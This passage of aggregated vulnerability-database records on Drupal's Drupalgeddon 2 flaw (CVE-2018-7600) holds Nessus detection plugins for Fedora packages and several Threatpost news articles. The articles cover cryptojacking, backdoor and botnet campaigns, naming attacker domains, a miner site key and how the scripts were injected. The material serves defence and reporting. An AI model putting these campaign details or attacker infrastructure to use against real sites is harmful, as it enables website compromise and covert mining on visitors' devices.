preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.6-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:17", "description": "- [8.3.9](https://www.drupal.org/project/drupal/releases/8.3.9)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002)\n\n - [8.3.8](https://www.drupal.org/project/drupal/releases/8.3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-24T00:00:00", "type": "nessus", "title": "Fedora 26 : drupal8 (2018-922cc2fbaa) 
(Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-922CC2FBAA.NASL", "href": "https://www.tenable.com/plugins/nessus/109288", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-922cc2fbaa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109288);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n 
(CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-922cc2fbaa\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-001\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal8-8.3.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. 
Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. 
Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. 
\u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. According to the advisory, when using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. 
When untrusted input is not sanitized correctly, that can lead to remote code execution.
Essentially, in some conditions, content moderation fails to check a user\u2019s access to use certain transitions \u2013 potentially allowing access bypass.
8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). 
\u201cUsing the bulk scan feature of urlscan.io, it became clear these sites were all running outdated and vulnerable versions of the Drupal content management system.\u201d
\u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. 
[pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. 
They achieve this by adding the malicious JavaScript (me0w.js) to the commonly used index.php file
This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MIRTE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). 
There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security oriented content delivery network services, CloudFlare and Fastly, have also rolled-out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer and Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said, Drupal is not releasing any of the technical aspects of the vulnerability other than the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this a blunt solution to the problem and not fixing the specific vulnerable code. 
But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. 
What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. 
The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. 
